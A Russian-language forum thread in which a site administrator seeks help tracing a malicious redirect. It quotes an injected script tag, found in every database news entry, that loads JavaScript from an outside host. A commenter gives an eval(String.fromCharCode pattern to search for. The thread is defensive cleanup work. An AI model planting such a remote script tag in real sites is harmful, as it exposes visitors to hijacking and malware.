# Удаление вредоносного кода

Tags: вирусы

На сайте время от времени срабатывает редирект, посмотрел по файлах код найти не смог, проверил онлайн антивирусом, он этот редирект нашел но где код расположен тоже не показал....

собственно вопрос, как найти этот код, где прописан этот редирект

Вот отчет антивируса https://rescan.pro/result.php?f23ea37eb7bea4e9fbf6e7087fa67956

никак не могу найти где ссылка на этот скрипт появляется https://mp3menu.org/mp3.js

**АП:** проверил все файлы темы ничего не нашел... зато в базе данных заметил что в каждой новости в самом конце добавлен вот такой код https://hotopponents.site/site.js' type='text/javascript'> походу вирус там сидит? или ошибаюсь?

Comment: eval(String.fromCharCode(40,
Вот это ищите в файлах, если не выйдет - значит еще раз обернуто на стороне сервера.

Comment: проверил все файлы темы ничего не нашел... зато в базе данных заметил что в каждой новости в самом конце добавлен вот такой код <script src='https://hotopponents.site/site.js' type='text/javascript'></script> походу вирус там сидит? или ошибаюсь?

Comment: Что же их добавило в каждую новость?) ищите что именно

Comment: вот этого не знаю... сайты не мои... причем на хостинге 7 сайтов, и в каждой БД этот скрип висит + в хедере на каждом сайте такойже код как в этом скрипте прописан

Comment: ну так исследуйте файлы, ищите места где есть запись в базу...
если она централизована(запись в БД) - найдите это место и посмотрите кто именно проводит эти записи в БД